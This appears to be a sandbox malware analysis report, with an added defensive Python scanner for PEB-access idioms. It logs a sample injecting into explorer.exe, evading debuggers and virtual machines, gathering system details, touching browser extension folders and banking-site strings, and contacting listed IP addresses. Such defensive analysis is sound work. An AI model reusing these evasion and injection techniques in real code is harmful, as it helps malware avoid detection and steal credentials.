Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_03221016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, 12_2_03221016
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 440
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 1411
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 622
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 1302
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 884
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 865
Source: C:\Windows\SysWOW64\explorer.exe | Window / User API: threadDelayed 2919
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 2564
Source: C:\Windows\SysWOW64\explorer.exe | Window / User API: threadDelayed 4321
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 4229
Source: C:\Users\user\AppData\Local\Temp\B575.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_8-4390
Source: C:\Windows\SysWOW64\explorer.exe | API coverage: 9.8 %
Source: C:\Windows\explorer.exe TID: 5784 | Thread sleep count: 440 > 30
Source: C:\Windows\explorer.exe TID: 5672 | Thread sleep count: 1411 > 30
Source: C:\Windows\explorer.exe TID: 5672 | Thread sleep time: -141100s >= -30000s
Source: C:\Windows\explorer.exe TID: 6788 | Thread sleep count: 622 > 30
Source: C:\Windows\explorer.exe TID: 6788 | Thread sleep time: -62200s >= -30000s
Source: C:\Windows\explorer.exe TID: 3192 | Thread sleep count: 323 > 30
Source: C:\Windows\explorer.exe TID: 1352 | Thread sleep count: 313 > 30
Source: C:\Windows\explorer.exe TID: 1352 | Thread sleep time: -31300s >= -30000s
Source: C:\Windows\explorer.exe TID: 6968 | Thread sleep count: 290 > 30
Source: C:\Windows\explorer.exe TID: 2820 | Thread sleep count: 96 > 30
Source: C:\Windows\explorer.exe TID: 1292 | Thread sleep count: 128 > 30
Source: C:\Windows\explorer.exe TID: 3292 | Thread sleep count: 160 > 30
Source: C:\Windows\explorer.exe TID: 1076 | Thread sleep count: 37 > 30
Source: C:\Windows\explorer.exe TID: 5672 | Thread sleep count: 1302 > 30
Source: C:\Windows\explorer.exe TID: 5672 | Thread sleep time: -130200s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 2788 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5692 | Thread sleep count: 2919 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5692 | Thread sleep time: -2919000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1656 | Thread sleep count: 2564 > 30
Source: C:\Windows\explorer.exe TID: 1656 | Thread sleep time: -2564000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 4436 | Thread sleep count: 4321 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 4436 | Thread sleep time: -4321000s >= -30000s
Source: C:\Windows\explorer.exe TID: 4752 | Thread sleep count: 4229 > 30
Source: C:\Windows\explorer.exe TID: 4752 | Thread sleep time: -4229000s >= -30000s
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\B575.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\B575.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\B575.exe | Code function: 8_2_00007FF7CB87FB34 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose, 8_2_00007FF7CB87FB34
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03272B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose, 9_2_03272B15
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03273ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose, 9_2_03273ED9
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03271D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose, 9_2_03271D4A
Source: C:\Windows\explorer.exe | Code function: 11_2_001D30A8 FindFirstFileW,FindNextFileW,FindClose, 11_2_001D30A8
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03276512 GetSystemInfo, 9_2_03276512
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: explorer.exe, 00000002.00000000.2127227127.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: 7020.tmp.9.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 7020.tmp.9.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2123559301.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: 7020.tmp.9.dr | Binary or memory string: global block list test formVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2127227127.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2999912401.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2999912401.00000000035DF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: 7020.tmp.9.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 7020.tmp.9.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 7020.tmp.9.dr | Binary or memory string: AMC password management pageVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTcaVMWare
Source: 7020.tmp.9.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
Source: 7020.tmp.9.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 7020.tmp.9.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 7020.tmp.9.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2125128556.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: 7020.tmp.9.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: explorer.exe, 00000002.00000000.2124263465.0000000003530000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: 7020.tmp.9.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2125128556.000000000769A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 7020.tmp.9.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2125128556.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: 7020.tmp.9.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2124263465.0000000003530000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.
Source: 7020.tmp.9.dr | Binary or memory string: discord.comVMware20,11696428655f
Source: 7020.tmp.9.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 7020.tmp.9.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 7020.tmp.9.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 7020.tmp.9.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: B575.exe, 00000008.00000002.4536563179.000002EC777EA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: 7020.tmp.9.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 7020.tmp.9.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 7020.tmp.9.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 7020.tmp.9.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: ROUTE.EXE, 00000021.00000002.3366799924.000002C0188B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 7020.tmp.9.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 7020.tmp.9.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 7020.tmp.9.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 7020.tmp.9.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: 7020.tmp.9.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: explorer.exe, 00000002.00000000.2124263465.0000000003530000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: 7020.tmp.9.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 7020.tmp.9.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: B575.exe, 00000008.00000002.4536563179.000002EC777EA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fo & echo 2843835231311335232843835231\r\n\r\nHost Name: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71388-77023-AAOEM\r\nOriginal Install Date: 03/10/2023, 10:57:18\r\nSystem Boot Time: 24/09/2023, 16:13:49\r\nSystem Manufacturer: VacWyv9nX5Hvulv\r\nSystem Model: nkTukOKS\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: LXNC3 5EM7Z, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'919 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'170 MB\r\nVirtual Memory: In Use: 1'021 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: YEkCP\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.5\r\n [02]: fe80::357a:d50d:a849:be2d\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n2843835231311335232843835231\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp> Record . . . : 116.58.10.60
Source: explorer.exe, 00000002.00000000.2124263465.0000000003530000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware,p
Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: 7020.tmp.9.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000002.00000000.2123559301.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Process information queried: ProcessInformation

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_03221B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,12_2_03221B17
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_03221016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,12_2_03221016
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB8778EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,8_2_00007FF7CB8778EC
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_0260092B mov eax, dword ptr fs:[00000030h]0_2_0260092B
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_02600D90 mov eax, dword ptr fs:[00000030h]0_2_02600D90
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_0266F20B push dword ptr fs:[00000030h]0_2_0266F20B
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_0252092B mov eax, dword ptr fs:[00000030h]4_2_0252092B
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_02520D90 mov eax, dword ptr fs:[00000030h]4_2_02520D90
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_026DEB13 push dword ptr fs:[00000030h]4_2_026DEB13
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_024E092B mov eax, dword ptr fs:[00000030h]6_2_024E092B
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_024E0D90 mov eax, dword ptr fs:[00000030h]6_2_024E0D90
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_0267EDE3 push dword ptr fs:[00000030h]6_2_0267EDE3
                Source: C:\Users\user\AppData\Roaming\uejbbriCode function: 7_2_024A092B mov eax, dword ptr fs:[00000030h]7_2_024A092B
                Source: C:\Users\user\AppData\Roaming\uejbbriCode function: 7_2_024A0D90 mov eax, dword ptr fs:[00000030h]7_2_024A0D90
                Source: C:\Users\user\AppData\Roaming\uejbbriCode function: 7_2_025FEC0B push dword ptr fs:[00000030h]7_2_025FEC0B
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB872654 GetProcessHeap,RtlReAllocateHeap,8_2_00007FF7CB872654
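
Twelve of the hits above are the single instruction `mov eax, dword ptr fs:[00000030h]` or `push dword ptr fs:[00000030h]`. On 32-bit Windows fs points at the TEB and offset 0x30 holds the PEB pointer, so this is the first instruction of the classic `PEB.BeingDebugged` (offset 0x02) and `PEB.NtGlobalFlag` (offset 0x68) checks, but it is equally the first instruction of shellcode-style API resolution through `PEB.Ldr` (offset 0x0C), which the injector seen in `12_2_03221B17` (LoadLibraryA/GetProcAddress/LdrProcessRelocationBlock) also needs. The sandbox counts every fs:[30h] read as anti-debugging; the instruction that follows is what tells the two apart. The scanner below is an added example, not part of the report or of the sample: it finds the three encodings of the idiom (`64 A1 disp32`, `64 8B /r disp32`, `64 FF /6 disp32`) in a 32-bit code blob and names the PEB field read next. The byte string it runs on is constructed, the classifier only follows the `[reg+disp8]` load forms listed in its comment, and it applies to the 32-bit processes in this report only (x64 code reaches the PEB through gs:[60h], and the 64-bit B575.exe at 8_2_00007FF7... shows no such hit).

```python
"""Find 32-bit fs:[disp32] reads (the PEB-access idiom behind the report's
'mov eax, dword ptr fs:[00000030h]' and 'push dword ptr fs:[00000030h]' hits)
and name the PEB field the code touches next: 0x02 BeingDebugged and 0x68
NtGlobalFlag are anti-debug checks, 0x0C Ldr is API resolution, 0x18 is the
process heap. Added example; CODE is a constructed byte string, not the sample."""
import struct

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}

def find_fs_reads(code):
    """Yield (offset, mnemonic, disp32, length) for each fs-segment disp32 load:
    64 A1 disp32 (mov eax), 64 8B /r disp32 (mov r32), 64 FF /6 disp32 (push)."""
    i = 0
    while i < len(code):
        if code[i] != 0x64:
            i += 1
            continue
        op = code[i + 1] if i + 1 < len(code) else None
        if op == 0xA1 and i + 6 <= len(code):
            yield i, "mov eax", struct.unpack_from("<I", code, i + 2)[0], 6
            i += 6
            continue
        if op in (0x8B, 0xFF) and i + 7 <= len(code):
            modrm = code[i + 2]
            mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
            if mod == 0 and rm == 5:                       # [disp32] addressing
                disp = struct.unpack_from("<I", code, i + 3)[0]
                if op == 0x8B:
                    yield i, "mov " + REG32[reg], disp, 7
                    i += 7
                    continue
                if reg == 6:
                    yield i, "push", disp, 7
                    i += 7
                    continue
        i += 1

def classify(code, pos, reg):
    """Name the PEB field read by the instruction at pos if it is a
    [reg+disp8] load: movzx/movsx (0F B6/B7/BE), mov r8/r32 (8A/8B), cmp (80)."""
    for prefix in (b"\x0f\xb6", b"\x0f\xb7", b"\x0f\xbe", b"\x8a", b"\x8b", b"\x80"):
        n = len(prefix)
        if code[pos:pos + n] == prefix and pos + n + 1 < len(code):
            modrm = code[pos + n]
            if modrm >> 6 == 1 and modrm & 7 == reg and reg != 4:   # mod=01, no SIB
                disp = code[pos + n + 1]
                return PEB_FIELDS.get(disp, "PEB+0x%02X" % disp)
    return None

def scan(code):
    """Return every fs:[disp32] read; for fs:[30h] (TEB->PEB) reads, add the field."""
    hits = []
    for off, insn, disp, length in find_fs_reads(code):
        field, pos = None, off + length
        if disp == 0x30:
            reg = REG32.index(insn.split()[1]) if insn.startswith("mov") else None
            if insn == "push" and pos < len(code) and 0x58 <= code[pos] <= 0x5F:
                reg, pos = code[pos] - 0x58, pos + 1     # push fs:[30h] / pop r32 pair
            if reg is not None:
                field = classify(code, pos, reg)
        hits.append({"offset": off, "insn": insn, "seg_off": disp, "field": field})
    return hits

# Constructed 32-bit code: three anti-debug idioms, one API-resolution walk,
# one mov-ecx variant and one fs:[18h] (TEB self pointer) read as a non-PEB control.
CODE = bytes.fromhex(
    "90"                        # nop
    "64a130000000" "0fb64002"   # mov eax,fs:[30h]; movzx eax,byte [eax+2]  BeingDebugged
    "85c0" "7505"               # test eax,eax; jnz
    "64a130000000" "8b4068"     # mov eax,fs:[30h]; mov eax,[eax+68h]       NtGlobalFlag
    "a970000000"                # test eax,70h
    "64a130000000" "8b400c"     # mov eax,fs:[30h]; mov eax,[eax+0Ch]       Ldr
    "8b4014"                    # mov eax,[eax+14h] (InMemoryOrderModuleList)
    "64ff3530000000" "58"       # push dword fs:[30h]; pop eax
    "0fb64002"                  # movzx eax,byte [eax+2]                    BeingDebugged
    "648b0d30000000" "0fb64102" # mov ecx,fs:[30h]; movzx eax,byte [ecx+2]  BeingDebugged
    "64a118000000"              # mov eax,fs:[18h]  (TEB self pointer, not the PEB)
    "c3"                        # ret
)

if __name__ == "__main__":
    for h in scan(CODE):
        print("0x%04x %-8s fs:[0x%02X] -> %s" % (h["offset"], h["insn"], h["seg_off"], h["field"]))
```

Run on a dumped code section (for example the `0_2_0260092B` region) the field column is what to read: `BeingDebugged` / `NtGlobalFlag` hits are the anti-debug checks, `Ldr` hits are module-list walks that belong to the injector and would fire in any position-independent loader.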

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | File created: uejbbri.2.dr
Source: C:\Windows\explorer.exe | Network Connect: 116.58.10.60 80
Source: C:\Windows\explorer.exe | Network Connect: 190.98.23.157 80
Source: C:\Windows\explorer.exe | Network Connect: 23.145.40.164 443
Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 23.145.40.162 443
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Thread created: C:\Windows\explorer.exe EIP: 12319A8
Source: C:\Users\user\AppData\Roaming\esjbbri | Thread created: unknown EIP: 88519A8
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Thread created: unknown EIP: 8381970
Source: C:\Users\user\AppData\Roaming\uejbbri | Thread created: unknown EIP: 2FF1970
Source: C:\Windows\explorer.exe | Memory written: PID: 1684 base: A279C0 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 6760 base: 7FF6747E2D10 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 1532 base: A279C0 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 6432 base: 7FF6747E2D10 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 3304 base: A279C0 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 5008 base: 7FF6747E2D10 value: 90
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\esjbbri | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\esjbbri | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
